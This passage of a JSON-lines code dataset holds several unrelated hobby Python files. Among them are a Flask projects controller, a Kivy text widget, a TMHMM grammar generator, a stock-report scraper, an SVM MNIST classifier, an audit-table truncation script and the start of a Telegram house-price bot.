item[1][0] = int(item[1][0] * new_res[0] / 100)\n            item[1][1] = int(item[1][1] * new_res[1] / 100)\n\n\n        w = int( x_ratio * item[1][0] ) if isinstance(item[1][0], int) else item[1][0]# do not scale if it is an 'until line' marker\n        h = int( y_ratio * item[1][1] ) if isinstance(item[1][0], int) else item[1][1]\n        \n        if (invert):\n            x = str(x)\n            y = str(y)\n\n        final_scaled = [(x,y),(w,h)] if y is not None else [x,(w,h)]\n        new_list.append(final_scaled)\n    return new_list\n\ndef coordinates(coordinate_query,shape):\n    \n    new_res = list(shape)[:2]\n    new_res[1],new_res[0] = new_res[0] , new_res[1]\n    for counter, coordinate in enumerate(list_of_coordinates):\n        if coordinate_query == (counter+1):\n            return scaler(base_res=page_res[coordinate_query-1],new_res=new_res,input_list = coordinate) # Scale it to the resolution\n    \n    #print(\"err\")\n    return -1\n\n\n\n","repo_name":"Sinamirshahi/keenbeta","sub_path":"utb/config copy.py","file_name":"config copy.py","file_ext":"py","file_size_in_byte":12470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4918260261","text":"from flask import Blueprint, render_template, request, redirect, session, url_for\nfrom models.project_model import Project\nfrom app import db\nfrom decorators.auth_decors import isLoggedIn\nfrom sqlalchemy import and_\nimport markdown\n\nprojects_bp = Blueprint(\"projects\", __name__, template_folder=\"templates\")\n\n@projects_bp.route(\"/projects\")\ndef projects():\n    projects = None\n\n    if \"username\" in session:\n        projects = Project.query.all()\n    else:\n        projects = Project.query.filter(Project.published==1).all()\n\n    return render_template(\"projects.html\", projects=projects)\n\n@projects_bp.route(\"/project/<int:id>\")\ndef project(id):\n    project = Project.query.filter(Project.id==id).first()\n\n    if \"username\" not in session and project.published != 1:\n        return \"Not enough permissions.\"\n\n    html_content = markdown.markdown(project.content)\n\n    return render_template(\"project.html\", project=project, html_content=html_content)\n\n@projects_bp.route(\"/edit_project/<int:id>\")\n@isLoggedIn\ndef edit_project(id):\n    if session[\"permissions\"] != 1:\n        return \"Error.\"\n\n    project = Project.query.filter(Project.id==id).first()\n\n    return render_template(\"edit_project.html\", project=project, project_id=id)\n\n@projects_bp.route(\"/update_project\", methods=[\"POST\"])\n@isLoggedIn\ndef update_project():\n    if session[\"permissions\"] != 1:\n        return \"Error.\"\n\n    
title = request.form.get(\"title\")\n    description = request.form.get(\"description\")\n    content = request.form.get(\"content\")\n    id = request.form.get(\"id\", type=int)\n\n    project = Project.query.filter(Project.id==id).first()\n\n    project.title = title\n    project.description = description\n    project.content = content\n\n    db.session.commit()\n\n    return redirect(\"/\")\n\n@projects_bp.route(\"/create_project\", methods=[\"GET\", \"POST\"])\n@isLoggedIn\ndef create_project():\n    if session[\"permissions\"] != 1:\n        return \"Error.\"\n    \n    if request.method == \"POST\":\n        title = request.form.get(\"title\")\n        description = request.form.get(\"description\")\n\n        project = Project(title=title, description=description, content=f\"#{title}\")\n\n        db.session.add(project)\n        db.session.commit()\n\n        return redirect(\"/projects\")\n\n    return render_template(\"create_project.html\")\n\n@projects_bp.route(\"/delete_project/<int:id>\")\n@isLoggedIn\ndef delete_project(id):\n    if session[\"permissions\"] != 1:\n        return \"Error.\"\n    \n    project = Project.query.get(id)\n    db.session.delete(project)\n    db.session.commit()\n\n    return redirect(\"/projects\")","repo_name":"adam077x/heczkoadam","sub_path":"controllers/projects_controller.py","file_name":"projects_controller.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71376543228","text":"from kivy.uix.textinput import TextInput\nfrom kivy.properties import StringProperty\nimport functools\nimport re\n\nDEFAULT_PADDING = 6\n\n\nclass AlignedTextInput(TextInput):\n    halign = StringProperty('left')\n    valign = StringProperty('top')\n    pat = re.compile(r'[^\\u00f7\\u00d7+0-9]')\n\n    def insert_text(self, substring, from_undo=False):\n        pat = self.pat\n        if '.' 
in self.text:\n s = re.sub(pat, '', substring)\n else:\n s = '.'.join([re.sub(pat, '', s) for s in substring.split('.', 1)])\n return super(AlignedTextInput, self).insert_text(s, from_undo=from_undo)\n\n def __init__(self, **kwargs):\n self.halign = kwargs.get(\"halign\", \"left\")\n self.valign = kwargs.get(\"valign\", \"top\")\n\n self.bind(on_text=self.on_text)\n\n super().__init__(**kwargs)\n\n def on_text(self, instance, value):\n self.redraw()\n\n def on_size(self, instance, value):\n self.redraw()\n\n def redraw(self):\n \"\"\"\n Note: This methods depends on internal variables of its TextInput\n base class (_lines_rects and _refresh_text())\n \"\"\"\n self._refresh_text(self.text)\n\n total_size = [x.size for x in self._lines_rects] # Modified to handle runtime dynamic on_text\n max_size = functools.reduce(lambda x, y: (x[0]+y[0], x[1]), total_size)\n num_lines = 1 #len(self._lines_rects)\n\n px = [DEFAULT_PADDING, DEFAULT_PADDING]\n py = [DEFAULT_PADDING, DEFAULT_PADDING]\n\n if self.halign == 'center':\n d = (self.width - max_size[0]) / 2.0 - DEFAULT_PADDING\n px = [d, d]\n elif self.halign == 'right':\n px[0] = self.width - max_size[0] - DEFAULT_PADDING\n\n if self.valign == 'middle':\n d = (self.height - max_size[1] * num_lines) / 2.0 - DEFAULT_PADDING\n py = [d, d]\n elif self.valign == 'bottom':\n py[0] = self.height - max_size[1] * num_lines - DEFAULT_PADDING\n\n self.padding_x = px\n self.padding_y = py\n","repo_name":"MaddoxRauch/MathCat","sub_path":"alignedtextinput.py","file_name":"alignedtextinput.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"17163118743","text":"import sys\n\nMAP_LABEL_COLOR = {\n 'i': '#b3e2cd',\n 'O': '#fdcdac',\n 'o': '#cbd5e8',\n 'M': '#f4cae4'}\n\n\ndef parse_model(fp: str):\n \"\"\"Parse original TMHMM model file (currently only 2.0).\n Parameters\n ----------\n fp : str\n Filepath to original TMHMM model file.\n Download at https://services.healthtech.dtu.dk/cgi-bin/sw_request\n\n Returns\n -------\n Dict of HMM states.\n \"\"\"\n states = dict()\n with open(fp, 'r') as f:\n content = ''.join([line.strip()+' '\n for line in f.readlines()\n if (not line.startswith('#'))])\n for content_state in content.split('}'):\n keyvalues = dict()\n\n content_state = content_state.strip()\n if content_state == \"\":\n continue\n statename, statecontent = content_state.split('{')\n statename = statename.strip()\n\n for field in statecontent.split(';'):\n field = field.strip()\n if field == \"\":\n continue\n key = field.split()[0]\n keyvalues[key] = field.split()[1:]\n states[statename] = keyvalues\n\n # carry over tied transitions\n for name in states:\n if 'tied_trans' in states[name].keys():\n tiedtrans = []\n for i in range(len(states[name]['trans'])):\n tiedtrans.append(states[name]['trans'][i] + ':')\n tiedtrans.append(\n states[states[name]['tied_trans'][0]]['trans'][2*i+1])\n states[name]['trans'] = tiedtrans\n del states[name]['tied_trans']\n\n # allow begin -> end transition to parse \"\" string\n del states['begin']['end']\n\n return states\n\n\ndef model_to_graphviz(states: dict) -> str:\n \"\"\"Generates graphviz code to plot the (TM)HMM.\n\n Parameters\n ----------\n states:\n States of the HMM as obtained from \"parse_model\".\n\n Returns\n -------\n String that containes graphviz code.\n \"\"\"\n # dot graph\n out = \"digraph tmhmm {\\n\"\n for name in states.keys():\n state = states[name]\n\n if (name == 'header'):\n continue\n\n label 
= name\n attr = \"\"\n if 'label' in state.keys():\n label += '
%s' % state['label'][0]\n attr = 'fillcolor=\"%s\", style=filled' % MAP_LABEL_COLOR[\n state['label'][0]]\n if 'only' in state.keys():\n attr += ', shape=\"folder\"'\n out += \"state_%s [ label=<%s> %s ];\\n\" % (name, label, attr)\n if 'trans' in state.keys():\n if ':' in ''.join(state['trans']):\n for k in range(0, len(state['trans']), 2):\n prob = float(state['trans'][k+1])\n threshold = 0\n out += \"state_%s -> state_%s [ penwidth=%.2f %s ];\\n\" % (\n name,\n state['trans'][k].split(':')[0].strip(),\n max(1, 10 * prob),\n '' if prob > threshold else ', style=\"dotted\"'\n )\n else:\n for to in state['trans']:\n out += \"state_%s -> state_%s;\\n\" % (name, to)\n assert 'tied_trans' not in state.keys()\n out += \"}\\n\"\n\n return out\n\n\ndef model_to_grammar(states: dict) -> str:\n \"\"\"Translates model into ADP grammar.\n\n Parameters\n ----------\n states:\n States of the HMM as obtained from \"parse_model\".\n\n Returns\n -------\n String containing source code for grammar component of ADP source code.\n \"\"\"\n gra = \"grammar gra_tmhmm uses sig_tmhmm(axiom = state_begin) {\\n\"\n map_state_label = dict()\n for name, state in states.items():\n # skip the header \"state\", which defined the alphabet\n if (name == 'header'):\n continue\n\n # normalize label\n # - use first char\n # - use ' ' if no label is given\n label = \" \"\n if 'label' in state.keys():\n assert len(state['label']) == 1\n label = state['label'][0]\n map_state_label['state_%s' % name] = label\n\n # normalize transitions\n # - from 'a:', 'b', 'c:', 'd' build dict {'a': 'b', 'c': 'd'}\n # - add 'nil': '0' if ending parse in this state is allowed\n # - use float format instead of int, i.e. 0.0 instead of 0\n norm_transitions = None\n if ':' in ''.join(state['trans']):\n norm_transitions = {state['trans'][k].split(':')[0]:\n {'1': '1.0',\n '0': '0.0'}.get(\n state['trans'][k+1],\n state['trans'][k+1]) for k in range(0, len(state['trans']), 2)}\n if 'end' not in state.keys():\n norm_transitions.update({'end': '1.0'})\n else:\n assert state['end'] == ['0']\n else:\n assert False\n\n\n # transform emission information into GAP rules\n nt_emissions = \"emit_\"\n emissions = None\n assert len(\n set(['only', 'tied_letter', 'letter']) & set(state.keys())) == 1\n if 'only' in state.keys():\n nt_emissions += name\n es = {x.split(':')[0]: x.split(':')[-1] for x in state['only']}\n assert abs(sum(map(float, es.values())) - 1) < 0.001\n emissions = []\n for k, v in es.items():\n if float(v) <= 0:\n print(\"Emission probability of state '%s' for AA '%s' is zero! Emission will be omitted in grammar.\" % (name, k), file=sys.stderr)\n emissions.append(\" emission(CONST_FLOAT(%s), CHAR('%s'))\" % (v, k))\n elif 'tied_letter' in state.keys():\n assert len(state['tied_letter']) == 1\n nt_emissions += state['tied_letter'][0]\n elif 'letter' in state.keys():\n assert state['letter'] == ['NULL']\n nt_emissions = None\n emissions = None\n\n # transform transition information into GAP production rules\n code_transitions = []\n for to_state, prob in norm_transitions.items():\n if (emissions is None) and (nt_emissions is None):\n if to_state == \"end\":\n code_transitions.append(' state_end')\n else:\n code_transitions.append(' silent_transition(CONST_FLOAT(%s), state_%s)' % (prob, to_state))\n else:\n if float(prob) <= 0:\n print(\"Transition probability from state '%s' to state '%s' is zero! 
Transition will be omitted in grammar.\" % (name, to_state), file=sys.stderr)\n else:\n code_transitions.append(' transition(CONST_CHAR(\\'%s\\'), CONST_FLOAT(%s), %s, state_%s)' % (label, prob, nt_emissions, to_state))\n\n\n gra += ' state_%s =\\n%s\\n # h;\\n' % (name, ' |\\n'.join(code_transitions))\n if emissions is not None:\n gra += ' emit_%s =\\n%s\\n # h;\\n' % (name, ' |\\n'.join(emissions))\n\n gra += \"\\n\"\n\n gra += ' state_end = nil(EMPTY) # h;\\n'\n gra += \"}\\n\"\n\n return gra, map_state_label\n\n\ndef generic_sig_algs() -> str:\n sig = \"signature sig_tmhmm(alphabet, answer) {\\n\"\n sig += \" answer silent_transition(float, answer);\\n\"\n sig += \" answer transition(char, float, answer, answer);\\n\"\n sig += \" answer nil(void);\\n\"\n sig += \" answer emission(float, alphabet);\\n\"\n sig += \" choice [answer] h([answer]);\\n\"\n sig += \"}\\n\"\n\n alg_viterbi = (\n \"algebra alg_viterbi implements sig_tmhmm(alphabet=char, \"\n \"answer=float) {\\n\"\n \" float silent_transition(float prob, float t) {\\n\"\n \" return prob * t;\\n\"\n \" }\\n\"\n \" float transition(char label, float prob, float e, float t) {\\n\"\n \" return prob * e * t;\\n\"\n \" }\\n\"\n \" float nil(void) {\\n\"\n \" return 1.0;\\n\"\n \" }\\n\"\n \" float emission(float prob, char emission) {\\n\"\n \" return prob;\\n\"\n \" }\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(maximum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\")\n\n alg_fwd = (\n \"algebra alg_fwd extends alg_viterbi {\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(sum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\")\n\n alg_fwd_scaled = (\n \"algebra alg_fwd_scaled extends alg_viterbi {\\n\"\n \" float emission(float prob, char emission) {\\n\"\n \" /* 43.38 is a scaling factor against numeric instability,\\n\"\n \" * as candidate probabilities tend to become very small.\\n\"\n \" * The value is 1 / median of all emission probabilities\\n\"\n \" * in the TMHMM2 model; but in principle can be any value > 1.\\n\"\n \" */\\n\"\n \" return 22.56 * prob;\\n\"\n \" }\\n\"\n \" float normalize_derivative(float q, float pfunc) {\\n\"\n \" return q / pfunc;\\n\"\n \" }\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(sum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\")\n\n alg_viterbi_bit = (\n \"algebra alg_viterbi_bit extends alg_viterbi {\\n\"\n \" float silent_transition(float prob, float t) {\\n\"\n \" return log(1.0/prob) + t;\\n\"\n \" }\\n\"\n \" float transition(char label, float prob, float e, float t) {\\n\"\n \" return log(1.0/prob) + e + t;\\n\"\n \" }\\n\"\n \" float nil(void) {\\n\"\n \" return 0.0;\\n\"\n \" }\\n\"\n \" float emission(float prob, char emission) {\\n\"\n \" return log(1.0/prob);\\n\"\n \" }\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(minimum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\"\n )\n\n alg_fwd_bit = (\n \"algebra alg_fwd_bit extends alg_viterbi_bit {\\n\"\n \" float normalize_derivative(float q, float pfunc) {\\n\"\n \" return exp(pfunc - q);\\n\"\n \" }\\n\"\n \" choice [float] h([float] candidates) {\\n\"\n \" return list(negexpsum(candidates));\\n\"\n \" }\\n\"\n \"}\\n\"\n )\n\n alg_label = (\n \"algebra alg_label implements sig_tmhmm(alphabet=char,\"\n \" answer=Rope) {\\n\"\n \" Rope silent_transition(float prob, Rope x) {\\n\"\n \" return x;\\n\"\n \" }\\n\"\n \" Rope transition(char label, float prob, Rope e, Rope t) {\\n\"\n \" Rope res;\\n\"\n \" append(res, label);\\n\"\n \" append(res, t);\\n\"\n \" return 
res;\\n\"\n \" }\\n\"\n \" Rope nil(void) {\\n\"\n \" Rope res;\\n\"\n \" return res;\\n\"\n \" }\\n\"\n \" Rope emission(float prob, char emission) {\\n\"\n \" Rope res;\\n\"\n \" return res;\\n\"\n \" }\\n\"\n \" choice [Rope] h([Rope] candidates) {\\n\"\n \" return unique(candidates);\\n\"\n \" }\\n\"\n \"}\\n\"\n )\n\n return [sig, alg_viterbi, alg_fwd, alg_fwd_scaled, alg_viterbi_bit,\n alg_fwd_bit, alg_label]\n\n\ndef generate_gapc(fp_model: str, fp_output: str):\n model = parse_model(fp_model)\n\n grammar = model_to_grammar(model)[0]\n comps = generic_sig_algs()\n sig = comps.pop(0)\n algs = comps\n\n with open(fp_output, 'w') as f:\n f.write(\"import \\\"ext_hmm.hh\\\"\\n\")\n f.write(\"type Rope = extern\\n\\n\")\n f.write(sig+\"\\n\")\n f.write('algebra alg_enum auto enum;\\n\\n')\n f.write('algebra alg_count auto count;\\n\\n')\n for alg in algs:\n f.write(alg+\"\\n\")\n f.write(grammar+\"\\n\")\n f.write('instance dummy = gra_tmhmm(alg_enum);\\n')\n","repo_name":"jlab/ADP_collection","sub_path":"tmhmm.py","file_name":"tmhmm.py","file_ext":"py","file_size_in_byte":11607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17536364376","text":"# -*- coding=utf-8 -*-\n\n# 中泰证券研报\n# url0 = \"http://datainterface.eastmoney.com//EM_DataCenter/js.aspx?type=SR&sty=SRCC&stat=0&js=var%20zzsrYpDY={%22data%22:[(x)],%22pages%22:%22(pc)%22,%22update%22:%22(ud)%22,%22count%22:%22(count)%22}&ps=25\"\n# url1 = \"&p={}&code=80000157&rt=51774703\"\n# 个股研报\nurl0 = \"http://datainterface.eastmoney.com//EM_DataCenter/js.aspx?type=SR&sty=GGSR&js=var%20sHbElhIt={%22data%22:[(x)],%22pages%22:%22(pc)%22,%22update%22:%22(ud)%22,%22count%22:%22(count)%22}&ps=50\"\nurl1 = \"&p={}&mkt=0&stat=0&cmd=2&code=&rt=51774793\"\n\nimport requests\nimport collections\nimport pandas as pd\nimport xlrd\nimport numpy as np\nfrom datetime import datetime,timedelta\nimport time\nfrom connmongo import MongoConn\n\nclass getreports():\n def __init__(self,page):\n self.page = page\n\n def parsepage(self):\n for i in range(1, self.page):\n murl = url1.format(i)\n jsondata = requests.get(url0 + murl)\n print(jsondata.text)\n yield eval(jsondata.text.split('=')[1])\n\n\nif __name__ == '__main__':\n test = getreports(page=10)\n my_conn = MongoConn()\n finalrst = []\n keys = set()\n for dt in test.parsepage():\n rst = []\n for d in dt['data']:\n dt = d['datetime']\n dtt = datetime.strptime(dt,'%Y-%m-%dT%H:%M:%S') \n deathday = datetime.now()-timedelta(days=3)\n if deathday <= dtt:\n rst.append({d['secuName']:d['rate']})\n keys.add(d['secuName'])\n finalrst.extend(rst)\n final2 = dict.fromkeys(keys)\n for item in finalrst:\n mkey = list(item.keys())[0]\n mval = list(item.values())[0]\n if not final2.get(mkey):\n final2[mkey] = [mval]\n else:\n final2[mkey].append(mval)\n print(final2)\n final3 = dict.fromkeys(keys)\n for jk, jval in final2.items():\n final3[jk] = collections.Counter(jval)\n print(final3)\n final4 = pd.DataFrame.from_dict(final3)\n final5 = final4.transpose()\n final6 = final5.sort_index(by=[\"买入\",\"增持\"],ascending=[False,False])\n print(final6)\n filename = time.strftime('%Y-%m-%d',time.localtime())\n final6.to_csv(filename + \".csv\",encoding='utf_8_sig')\n\n\n\n\n\n","repo_name":"xiakexing716/eastmoney","sub_path":"yanbao.py","file_name":"yanbao.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"6606905136","text":"from heapq import heappop, 
heappush\nfrom typing import List, Set, Tuple\n\n\nmaxheap: List[Tuple[int, int]] = []\nminheap: List[Tuple[int, int]] = []\nremoved: Set[int] = set()\n\n\ndef insert(data: int, idx: int) -> None:\n heappush(maxheap, (-data, idx))\n heappush(minheap, (data, idx))\n\n\ndef delete(heap: List[Tuple[int, int]]) -> None:\n while heap:\n _, idx = heappop(heap)\n if idx not in removed:\n removed.add(idx)\n break\n\n\ndef get(heap: List[Tuple[int, int]]) -> int:\n while heap:\n data, idx = heappop(heap)\n if idx not in removed:\n return data\n return 0\n\n\ndef solution(operations: List[str]) -> List[int]:\n for idx, op in enumerate(operations):\n cmd, data = op.split()\n\n if cmd == \"I\":\n insert(int(data), idx)\n elif data == \"1\":\n delete(maxheap)\n else:\n delete(minheap)\n\n return [-get(maxheap), get(minheap)]\n","repo_name":"JeongGod/Algo-study","sub_path":"seonghoon/week02(22.01.04~22.01.10)/p42628.py","file_name":"p42628.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"32100403604","text":"import numpy as np\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.metrics import accuracy_score\r\n\r\ndata = np.genfromtxt(\"data/mnist_train.csv\", delimiter=\",\", skip_header=1)\r\ny, x = data[:, 0], data[:, 1:]\r\n\r\ntrain_size = 10000\r\ntest_size = 1000\r\n\r\nx_train, x_val = x[:train_size], x[train_size:train_size+test_size]\r\ny_train, y_val = y[:train_size], y[train_size:train_size+test_size]\r\n\r\nparam_grid = {\"C_values\": [1, 5, 10], \"gamma_values\": [1e-06, 1e-05, 1e-03]}\r\n# I searched for the best parameters of these ones, and found C=5 and gamma = 1e-06.\r\n# I found this out using GridSearch with the paramgrid shown.\r\n# I have removed this code since we now know the best hyperparameters.\r\n\r\nkernel_type = \"rbf\"\r\ngamma_type = \"scale\"\r\nC_value = 5\r\n\r\nsvm_classifier = SVC(kernel=kernel_type, gamma=gamma_type, C=C_value)\r\nsvm_classifier.fit(x_train, y_train)\r\n\r\npredicted_labels = svm_classifier.predict(x_val)\r\naccuracy_percentage = accuracy_score(y_val, predicted_labels) * 100\r\nprint(\"OVO Accuracy: {:.2f}%\".format(accuracy_percentage))\r\n\r\n\r\ndef OVA(X, y, C):\r\n classes = np.unique(y)\r\n models = {class_label: SVC(kernel=kernel_type, C=C, gamma=gamma_type, probability=True).fit(X, np.where(y == class_label, 1, 0)) for class_label in classes}\r\n return models\r\n\r\n\r\nova_models = OVA(x_train, y_train, C=5)\r\nnum_classes = len(ova_models)\r\nnum_samples = len(x_val)\r\nprobabilities = np.zeros((num_samples, num_classes))\r\n\r\nfor class_index, class_label in enumerate(ova_models):\r\n model = ova_models[class_label]\r\n binary_labels = np.where(y_val == class_label, 1, 0)\r\n probabilities[:, class_index] = model.predict_proba(x_val)[:, 1]\r\n\r\npredicted_labels = np.argmax(probabilities, axis=1)\r\naccuracy = np.mean(predicted_labels == y_val) * 100\r\n\r\nprint(\"OVA Accuracy: {:.2f}%\".format(accuracy))","repo_name":"Knoz9/ML-A3-A4","sub_path":"km222ug_A3/E3.py","file_name":"E3.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43627578214","text":"from typing import List\n\n\nclass Solution:\n # O(N)\n def sumOddLengthSubarrays(self, arr: List[int]) -> int:\n res = 0\n n = len(arr)\n for i in range(n):\n res += ((i + 1) * (n - i) + 1) // 2 * arr[i]\n return res\n\n\n # O(N^2)\n # Passing LC\n def sumOddLengthSubarrays_own(self, 
arr: List[int]) -> int:\n res = 0\n n = len(arr)\n preSums = [0]\n for num in arr:\n preSums.append(preSums[-1] + num)\n for i in range(n):\n for j in range(i, n, 2):\n res += preSums[j+1] - preSums[i]\n return res\n\n\n def test(self):\n test_cases = [\n [1,4,2,5,3],\n [1],\n [1,2],\n [10,11,12],\n ]\n for arr in test_cases:\n res = self.sumOddLengthSubarrays(arr)\n print('res: %s' % res)\n print('-='*30 + '-')\n\n\nif __name__ == '__main__':\n Solution().test()\n","repo_name":"MichaelTQ/LeetcodePythonProject","sub_path":"solutions/leetcode_1551_1600/LeetCode1588_SumAllOddLengthSubarrays.py","file_name":"LeetCode1588_SumAllOddLengthSubarrays.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"15932126431","text":"from sqlalchemy import create_engine,\\\n MetaData,\\\n Table\nfrom sqlalchemy.engine import reflection\nfrom sqlalchemy.orm import sessionmaker\nimport logging\nfrom mysql.connector.connection import MySQLConnection\nfrom .. import config\nimport os\nimport datetime\nfrom multiprocessing import Process\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom decimal import Decimal\nfrom sqlalchemy import and_\n\nBase = declarative_base()\n\n\nengine_name = config.get('mysqld', 'url')\n\ndef connect_mysql():\n \"\"\"\n return an inspector object\n \"\"\"\n MySQLConnection.get_characterset_info = MySQLConnection.get_charset\n\n db = create_engine(engine_name)\n db.echo = True\n db.connect()\n \n return db\n\nsqlite_engine = \"sqlite:///%s\"%(config.get('sqlite', 'backup_url'))\n\ndef connect_sqlite():\n\n db = create_engine(sqlite_engine, echo=True)\n db.connect()\n return db\n\ndef truncate_all_audit_tables():\n logging.info(\"Starting truncation\")\n\n mysql_db = connect_mysql()\n sqlite_db = connect_sqlite()\n\n # create a configured \"Session\" class\n session1 = sessionmaker(bind=mysql_db)\n session2 = sessionmaker(bind=sqlite_db)\n\n # create a Session\n mysql_session = session1()\n sqlite_session = session2() \n\n mysql_metadata = MetaData(mysql_db)\n sqlite_metadata = MetaData(sqlite_db)\n\n insp = reflection.Inspector.from_engine(mysql_db)\n\n tables = {}\n audit_tables = {}\n for table_name in insp.get_table_names():\n table = Table(table_name, mysql_metadata, autoload=True)\n if table_name.endswith('_aud'):\n audit_tables[table_name] = table\n else:\n tables[table_name] = table\n\n for t in tables:\n table = tables[t]\n audit_table = audit_tables.get(\"%s_aud\"%(t))\n if audit_table is None:\n logging.warning(\"Audit table for %s does not exist\"%(table.name))\n continue\n export_table_to_sqlite(mysql_session, sqlite_session, sqlite_metadata, audit_table)\n truncate_table(mysql_session, table, audit_table)\n \n mysql_session.commit()\n sqlite_session.commit()\n logging.info(\"Truncation Complete\")\n\ndef truncate_table(session, table, audit_table):\n \"\"\"\n @args: session so queries can be made, table so primary key columns\n can be determined and the audit_table to be truncated.\n \"\"\"\n pk_col_names = [x.name for x in table.primary_key.columns]\n\n truncated_cols = []\n for audit_col in audit_table.columns:\n if audit_col.name in pk_col_names:\n truncated_cols.append(audit_col)\n\n rs = session.query(*truncated_cols).group_by(*truncated_cols).all()\n\n for r in rs:\n args = []\n for arg in truncated_cols:\n args.append(arg == getattr(r, arg.name))\n \n aud_id_col = audit_table.c['aud_id']\n rs = 
session.query(aud_id_col).filter(and_(*args)).order_by(aud_id_col.desc())[3:]\n aud_ids = [str(r.aud_id) for r in rs]\n if len(aud_ids) > 0:\n delete_sql = \"delete from %(table_name)s where aud_id in %(aud_ids)s;\"\\\n %{'table_name':audit_table.name,\n 'aud_ids' : \"(%s)\"%(','.join(aud_ids),)}\n session.execute(delete_sql)\n\ndef export_table_to_csv(session, table, target=None):\n \"\"\"\n @args: session so queries can be made, table so primary key columns\n can be determined and the audit_table to be truncated.\n \"\"\"\n\n if target is None:\n target_dir = os.path.join(config.get('db', 'export_target'))\n target = os.path.join(config.get('db', 'export_target'), table.name)\n\n if not os.path.exists(target_dir):\n os.mkdir(target_dir)\n\n if os.path.exists(target):\n target_file = open(target, 'r+')\n \n rs = session.query(table).all()\n \n entries_in_db = set()\n for r in rs:\n entries_in_db.add(\"%s\"%(r.__repr__()))\n\n contents = set(target_file.read().split('\\n'))\n \n new_data = entries_in_db.difference(contents)\n\n if len(new_data) > 0:\n target_file.write(\"%s\\n\"%(datetime.datetime.now()))\n target_file.write(\"%s\\n\"%('.'.join([c.name for c in table.columns])))\n for d in new_data:\n target_file.write(\"%s\\n\"%(d))\n else:\n target_file = open(target, 'w')\n rs = session.query(table).all()\n target_file.write(\"%s\\n\"%(datetime.datetime.now()))\n target_file.write(\"%s\\n\"%('.'.join([c.name for c in table.columns])))\n for r in rs:\n target_file.write(\"%s\\n\"%(r.__repr__()))\n\ndef export_table_to_sqlite(mysql_session, sqlite_session, sqlite_metadata, audit_table):\n \"\"\"\n @args: session so queries can be made, table so primary key columns\n can be determined and the audit_table to be truncated.\n \"\"\"\n\n\n current_data = mysql_session.query(audit_table).all()\n\n sqlite_table = Table(audit_table.name, sqlite_metadata, autoload=True)\n\n sqlite_data = sqlite_session.query(sqlite_table).all()\n\n entries_in_mysql_db = set(current_data)\n entries_in_sqlite_db = set(sqlite_data)\n \n new_data = list(entries_in_mysql_db.difference(entries_in_sqlite_db))\n if len(new_data) > 0:\n values = [] \n for val in new_data:\n row = []\n for i, v in enumerate(val):\n if type(v) == Decimal:\n row.append(float(v))\n else:\n row.append(v)\n values.append(tuple(row))\n\n markers = ','.join('?' 
* len(new_data[0]))\n colnames = '(%s)'%(','.join(new_data[0].keys()))\n ins = 'INSERT INTO {tablename} {colnames} VALUES ({markers})'\n ins = ins.format(tablename=sqlite_table.name, colnames=colnames, markers=markers)\n res = sqlite_session.connection().execute(ins, values)\n\n logging.info(res)\n\ndef run():\n p = Process(target=truncate_all_audit_tables)\n p.start()\n #p.join()\n\nif __name__ == '__main__':\n logging.basicConfig(level='INFO')\n truncate_all_audit_tables()\n\n","repo_name":"hydraplatform/hydra-base","sub_path":"hydra_base/db/truncate.py","file_name":"truncate.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"6"} +{"seq_id":"2193066987","text":"import telegram\nimport pickle\nfrom telegram.ext import Updater, CommandHandler, MessageHandler, Filters\nfrom telegram import InlineKeyboardMarkup, InlineKeyboardButton\nimport pandas as pd\nimport sklearn\n\ntext = \"\"\nvia = \"\"\nsobborgo = \"\"\nnumcam = 0\nnumbagn = 0\nnumgarage = 0\nlandarea = 0\nfloor = 0\nbuild = 0\ndistcentro = 0\nneastn = \"\"\nneastndist = 0\ndatesold = 0\npostcode = 0\nlatitude = 0\nlongitude = 0\nnearestsch = \"\"\nnearestschdist = 0\nnearestschgrade = 0\nuser_location = 0\ndati_inviati = 0\n# funzione che gestisce il comando /start\ndef start(update, context):\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Ciao! Sono un bot che predice il costo di una casa nella città di Perth. Quando verrà chiesto di inserire un dati in numero bisogna inserire un numero intero. Inserisci la tua via e il sobborgo separati da una virgola.\")\n context.user_data['dati_inviati'] = 0\n\n# funzione che gestisce i messaggi di testo\ndef text_message(update, context):\n if context.user_data['dati_inviati'] == 0:\n text = update.message.text\n via, sobborgo = text.split(',')\n context.user_data['via'] = via.strip()\n context.user_data['sobborgo'] = sobborgo.strip()\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci il numero di camere che ha la tua casa\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 1:\n numcam = int(update.message.text)\n context.user_data['camere'] = numcam\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci il numero di bagni che ha la tua casa?\")\n context.user_data['dati_inviati'] += 1\n elif context.user_data['dati_inviati'] == 2:\n numbagn = int(update.message.text)\n context.user_data['bagni'] = numbagn\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Inserisci il numero 